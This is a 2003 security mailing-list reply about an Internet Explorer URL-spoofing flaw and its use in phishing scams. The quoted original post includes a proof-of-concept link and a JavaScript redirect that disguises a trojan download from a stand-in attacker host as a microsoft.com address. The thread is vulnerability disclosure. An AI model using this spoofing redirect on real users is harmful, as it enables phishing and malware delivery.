I don't really think it will make that much of a difference their profits considering anyone dumb enough to fall for those scams isn't going to know the difference between an IP address in the URL box and a "spoofed" domain. I had a client fall for an eBay scam and the end resulting domain in the URL box was damn near www.robbingyoublinddamngringo.com. I can see where a more effective scam would be, like you hinted at, the infamous microsoft security update emails.
----- Original Message ----- From: "S G Masood" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, December 09, 2003 12:22 PM Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability > > LOL. This is so simple and dangerous, it almost made > me laugh and cry at the same time. Most of you will > realise why...;D > The Paypal, AOL, Visa, Mastercard, et al email > scammers will have a harvest of gold this month with > lots of zombies falling for this simple technique. > > ># POC ########## > >http://www.zapthedingbat.com/security/ex01/vun1.htm > > Dont be surprised if your latest download from > http://www.microsoft.com turns out to be a trojan! > > location.href=unescape('http://[EMAIL PROTECTED] eviltrojanfromme.com); > > > -- > S.G.Masood > > Hyderabad, > India > > PS: One more thing - no scripting required to exploit this. > > __________________________________ > Do you Yahoo!? > Free Pop-Up Blocker - Get it now > http://companion.yahoo.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
